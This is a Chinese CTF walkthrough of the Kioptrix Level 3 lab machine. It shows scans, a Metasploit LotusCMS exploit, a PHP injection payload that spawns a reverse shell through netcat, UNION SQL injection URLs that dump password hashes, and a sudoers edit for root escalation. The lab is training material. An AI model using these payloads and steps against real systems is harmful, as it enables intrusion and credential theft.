vulnhub靶机练习之Kioptix Level 3

探测靶机

同样需要更改虚拟机文件KioptrixVM3.vmx，把ethernet0.connectionType = "bridged"改为ethernet0.connectionType = "nat"。

使用sudo arp-scan -l扫描内网，发现靶机IP是192.168.80.18。

kali@kali:~$ sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b2:07:af, IPv4: 192.168.80.14
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.80.1    00:50:56:c0:00:08       VMware, Inc.
192.168.80.2    00:50:56:fc:96:a7       VMware, Inc.
192.168.80.18   00:0c:29:ec:76:c0       VMware, Inc.
192.168.80.17   00:0c:29:fe:3a:82       VMware, Inc.
192.168.80.254  00:50:56:f8:e1:4e       VMware, Inc.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.077 seconds (123.25 hosts/sec). 5 responded

nmap扫描

输入命令sudo nmap -A -T5 -sS 192.168.80.18，扫描结果如下：

kali@kali:~$ sudo nmap -A -T5 -sS 192.168.80.18
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-24 23:44 EST
Nmap scan report for 192.168.80.18
Host is up (0.0011s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:EC:76:C0 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.12 ms 192.168.80.18

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.51 seconds

我们扫描发现靶机开放了22端口（SSH服务）和80端口（http服务）。

继续扫描漏洞

输入nikto -h 192.168.80.18，扫描结果：

kali@kali:~$ nikto -h 192.168.80.18
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.80.18
+ Target Hostname:    192.168.80.18
+ Target Port:        80
+ Start Time:         2020-02-24 23:51:52 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Server may leak inodes via ETags, header found with file /favicon.ico, inode: 631780, size: 23126, mtime: Fri Jun  5 15:22:00 2009
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpmyadmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 7914 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2020-02-24 23:52:27 (GMT-5) (35 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

设置域名解析

searchsploit查找网站框架漏洞

访问网站的登录页面，看到提示信息：此网站基于LotusCMS框架。

kali@kali:~$ searchsploit LotusCMS
----------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                   |  Path
                                                                 | (/usr/share/exploitdb/)
----------------------------------------------------------------- ----------------------------------------
LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit)    | exploits/php/remote/18565.rb
LotusCMS 3.0.3 - Multiple Vulnerabilities                        | exploits/php/webapps/16982.txt
----------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

漏洞相关介绍资料

metasploit漏洞利用过程

反弹shell方法一（msfconsole）：

msf5 exploit(multi/http/lcms_php_exec) > use exploit/multi/http/lcms_php_exec
msf5 exploit(multi/http/lcms_php_exec) > show options

Module options (exploit/multi/http/lcms_php_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.80.18    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /lcms/           yes       URI
   VHOST                     no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.80.14    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0


msf5 exploit(multi/http/lcms_php_exec) >  set URI / 
URI => /
msf5 exploit(multi/http/lcms_php_exec) >  set RHOST kioptrix3.com
RHOST => kioptrix3.com
msf5 exploit(multi/http/lcms_php_exec) > run

[*] Started reverse TCP handler on 192.168.80.14:4444 
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Sending stage (38288 bytes) to 192.168.80.18
[*] Meterpreter session 1 opened (192.168.80.14:4444 -> 192.168.80.18:33134) at 2020-02-25 08:35:44 -0500

meterpreter > shell
Process 4855 created.
Channel 0 created.
whoami
www-data

反弹shell方法二（使用php注入）：

1. 攻击机监听5555端口：

   kali@kali:~$ nc -lnvp 5555
   listening on [any] 5555 ...

2. 浏览器中输入payload：
   php的system函数是干嘛的？
   http://kioptrix3.com/index.php?page=index');${system(‘nc -e /bin/sh 192.168.80.14 5555’)};#
   注意：这里的192.168.80.14是攻击机的IP。关键是对page这个参数进行命令注入，反弹shell至攻击机。
   
   进入这个shell中查找关键信息，发现这个gconfig.php文件，看看内容是什么：

   head -20 gconfig.php #前20行数据，因为直接cat查看，一屏看不完
   <?php
           error_reporting(0);
           /*
                   A sample Gallarific configuration file. You should edit
                   the installer details below and save this file as gconfig.php
                   Do not modify anything else if you don't know what it is.
           */
   
           // Installer Details -----------------------------------------------
   
           // Enter the full HTTP path to your Gallarific folder below,
           // such as http://www.yoursite.com/gallery
           // Do NOT include a trailing forward slash
   
           $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";
   
           $GLOBALS["gallarific_mysql_server"] = "localhost";
           $GLOBALS["gallarific_mysql_database"] = "gallery";
           $GLOBALS["gallarific_mysql_username"] = "root";
           $GLOBALS["gallarific_mysql_password"] = "fuckeyou";

   在这个配置文件里，我们发现了重要信息，mysql数据库的root账号密码：root/fuckeyou。
   于是我们在shell中进入mysql数据库，查询到用户名dreg和loneferret，并获取到密码的md5密文。

   # mysql -u root -p
   Enter password: 
   Welcome to the MySQL monitor.  Commands end with ; or \g.
   Your MySQL connection id is 70
   Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
   
   Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
   
   mysql> show databases;
   +--------------------+
   | Database           |
   +--------------------+
   | information_schema | 
   | gallery            | 
   | mysql              | 
   +--------------------+
   3 rows in set (0.00 sec)
   
   mysql> use gallery
   Reading table information for completion of table and column names
   You can turn off this feature to get a quicker startup with -A
   
   Database changed
   mysql> show tables;
   +----------------------+
   | Tables_in_gallery    |
   +----------------------+
   | dev_accounts         | 
   | gallarific_comments  | 
   | gallarific_galleries | 
   | gallarific_photos    | 
   | gallarific_settings  | 
   | gallarific_stats     | 
   | gallarific_users     | 
   +----------------------+
   7 rows in set (0.00 sec)
   
   mysql> select * from dev_accounts;
   +----+------------+----------------------------------+
   | id | username   | password                         |
   +----+------------+----------------------------------+
   |  1 | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 | 
   |  2 | loneferret | 5badcaf789d3d1d09794d8f021f40f0e | 
   +----+------------+----------------------------------+
   2 rows in set (0.00 sec)

   发现存在sql注入的url

   【now】——【Ligoat Press Room】
   
   
   
   输入'（url：http://kioptrix3.com/gallery/gallery.php?id=%27） 判断是否存在注入点：
   

   sql注入的过程

3. 查出一共有多少列
   http://kioptrix3.com/gallery/gallery.php?id=1 order by 1– (No Error)
   http://kioptrix3.com/gallery/gallery.php?id=1 order by 2– (No Error)
   http://kioptrix3.com/gallery/gallery.php?id=1 order by 3– (No Error)
   http://kioptrix3.com/gallery/gallery.php?id=1 order by 4– (No Error)
   http://kioptrix3.com/gallery/gallery.php?id=1 order by 5– (No Error)
   http://kioptrix3.com/gallery/gallery.php?id=1 order by 6– (No Error)
   http://kioptrix3.com/gallery/gallery.php?id=1 order by 7– (Error – Unknown Column)
   根据查询结果，可判断出一共有6列。
4. 找到可查询的列
   http://kioptrix3.com/gallery/gallery.php?id=-1%20union%20all%20select%201,2,3,4,5,6--
   
   根据查询结果，发现可以查询第二列和第三列的数据。
5. 获取数据库版本
   http://kioptrix3.com/gallery/gallery.php?id=-1%20union%20all%20select%201,@@version,database(),4,5,6--
   
   数据库版本是5.0.51a-3ubuntu5.4。
6. 查询所有的数据库
   http://kioptrix3.com/gallery/gallery.php?id=-1%20union%20select%201,2,group_concat(table_name),4,5,6%20from%20information_schema.tables%20where%20table_schema=database()--
   
   数据库包括：dev_accounts,gallarific_comments,gallarific_galleries,gallarific_photos,gallarific_settings,gallarific_stats,gallarific_users
7. 查询数据库dev_accounts的内容
   http://kioptrix3.com/gallery/gallery.php?id=-1%20union%20select%201,group_concat(column_name),3,4,5,6%20FROM%20information_schema.columns%20WHERE%20table_name=CHAR(100,%20101,%20118,%2095,%2097,%2099,%2099,%20111,%20117,%20110,%20116,%20115)--
   这里我们在网上把table_name=dev_accounts转化为ASCII的表示形式：table_name=char(100, 101, 118, 95, 97, 99, 99, 111, 117, 110, 116, 115)
   
8. 查询用户名和密码
   http://kioptrix3.com/gallery/gallery.php?id=-1%20union%20select%201,group_concat(username,0x3a,password),3,4,5,6%20FROM%20dev_accounts--
   
   注意，要把:转化为ASCII值0x3a。
   现在我们获取到了两个用户的用户名和密码：
   dreg:0d3eccfb887aabd50f243b3f155c0f85
   loneferret:5badcaf789d3d1d09794d8f021f40f0e
   观察可知，这个密码是md5密文，到网上解密可得到密码的明文。
   最终获取到，用户名密码是：
   dreg:Mast3r
   loneferret:starwars
9. 使用ssh登录用户loneferret

   kali@kali:~$ ssh loneferret@192.168.80.18
   loneferret@192.168.80.18's password: 
   Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
   
   The programs included with the Ubuntu system are free software;
   the exact distribution terms for each program are described in the
   individual files in /usr/share/doc/*/copyright.
   
   Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
   applicable law.
   
   To access official Ubuntu documentation, please visit:
   http://help.ubuntu.com/
   Last login: Tue Feb 25 10:45:22 2020 from localhost

   编辑/etc/sudoers：在/usr/local/bin/ht后面加上, /bin/sh。（备注：按Fn+F6进入编辑状态，按ALt+F保存，按Ctrl+Z退出编辑。）

   oneferret@Kioptrix3:~$ export TERM=xterm #进入编辑之前，必须要加这个环境变量
   loneferret@Kioptrix3:~$ sudo ht /etc/sudoers

   使用sudo /bin/sh进入root权限。

   loneferret@Kioptrix3:~$ sudo /bin/sh
   # whoami
   root

   找到flag页面：

   # cd /root
   # ls
   Congrats.txt  ht-2.0.18
   # ls -la
   total 52
   drwx------  5 root root  4096 2011-04-17 08:59 .
   drwxr-xr-x 21 root root  4096 2011-04-11 16:54 ..
   -rw-------  1 root root     9 2011-04-18 11:49 .bash_history
   -rw-r--r--  1 root root  2227 2007-10-20 07:51 .bashrc
   -rw-r--r--  1 root root  1327 2011-04-16 08:13 Congrats.txt
   drwxr-xr-x 12 root root 12288 2011-04-16 07:26 ht-2.0.18
   -rw-------  1 root root   963 2011-04-12 19:33 .mysql_history
   -rw-------  1 root root   228 2011-04-18 11:09 .nano_history
   -rw-r--r--  1 root root   141 2007-10-20 07:51 .profile
   drwx------  2 root root  4096 2011-04-13 10:06 .ssh
   drwxr-xr-x  3 root root  4096 2011-04-15 23:30 .subversion
   # cat Congrats.txt
   Good for you for getting here.
   Regardless of the matter (staying within the spirit of the game of course)
   you got here, congratulations are in order. Wasn't that bad now was it.
   
   Went in a different direction with this VM. Exploit based challenges are
   nice. Helps workout that information gathering part, but sometimes we
   need to get our hands dirty in other things as well.
   Again, these VMs are beginner and not intented for everyone. 
   Difficulty is relative, keep that in mind.
   
   The object is to learn, do some research and have a little (legal)
   fun in the process.
   
   
   I hope you enjoyed this third challenge.
   
   Steven McElrea
   aka loneferret
   http://www.kioptrix.com
   
   
   Credit needs to be given to the creators of the gallery webapp and CMS used
   for the building of the Kioptrix VM3 site.
   
   Main page CMS: 
   http://www.lotuscms.org
   
   Gallery application: 
   Gallarific 2.1 - Free Version released October 10, 2009
   http://www.gallarific.com
   Vulnerable version of this application can be downloaded
   from the Exploit-DB website:
   http://www.exploit-db.com/exploits/15891/
   
   The HT Editor can be found here:
   http://hte.sourceforge.net/downloads.html
   And the vulnerable version on Exploit-DB here:
   http://www.exploit-db.com/exploits/17083/
   
   
   Also, all pictures were taken from Google Images, so being part of the
   public domain I used them.

   参考博文

   https://www.abatchy.com/2016/12/kioptrix-3-walkthrough-vulnhub
   https://rastating.github.io/kioptrix-level-3-ctf-walkthrough/
   https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/

   拓展知识-sql注入讲解

   https://www.yeahhub.com/advanced-error-based-sql-injection-exploitation-manually/